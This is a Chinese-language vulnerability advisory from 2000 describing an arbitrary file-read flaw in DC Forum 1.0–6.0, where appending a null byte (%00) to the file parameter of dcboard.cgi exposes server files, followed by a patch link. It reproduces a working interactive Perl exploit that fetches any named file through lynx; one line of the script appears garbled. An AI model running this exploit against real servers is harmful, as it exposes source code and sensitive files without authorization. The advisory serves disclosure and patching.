DC Forum1.0 - 6.0存在任意文件可读漏洞发布时间:2000-12-28 更新时间:2000-12-28 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 DC Forum1.0 - 6.0详细描述 /dcforum/dcboard.cgi脚本中存在一个漏洞,可以一WEBSERVER身份查看任意 文件。如源代码和一些敏感信息文件。追加%00就可以显示文件内容。 测试代码 #!/usr/bin/perl # DC Forum Vulnerablitiy(Found In Versions From 1.0 - 6.0 According To CGISecurity.com Advisory) # Exploits Vulnerability That Allows Remote File Reading # By SteeLe # BEGIN { open(STDERR,">errors.txt"); } error checking $lynx = "/usr/bin/lynx"; # specify $site = $ARGV[0]; $cgi = $ARGV[1]; $inet = inet_aton($site); die "\n\t--- Usage:$0 <site> <cgi location,duh> ---" if(@ARGV == Ɔ' || @ARGV < 2); print "\n\t--- DCForum 1.0 - 6.0 Exploit ---"; print "\n\t--- By the cool fellas at * ---\n\n"; while(true) { # yea i think I stole this from the pollex.pl , uh thanks. print "[dcforum]Option:"; $action = <STDIN>; chomp($action); print "Valid Options: r(read files, usage r <file>), q(quit)\n" if($action ne "r" || $action ne "q"); if ($action eq "r") { print "\nFile(to read):"; $file = <STDIN>; chomp($file); # Old fashion shit, and I was lazy so be happy $url = "?az=list&file=$file%00"; $site = `$lynx http://$site$cgi$url`; print $site; } elsif ($action eq "q") { print "now exiting program\n"; exit; } } # (c) 2000 [Warez To Tha Extreme(Damn Thats A Lie)] 解决方案 从下面的地址下载升级程序:http://www.dcscripts.com/dcforum/dcfNews/124.html 相关信息 |
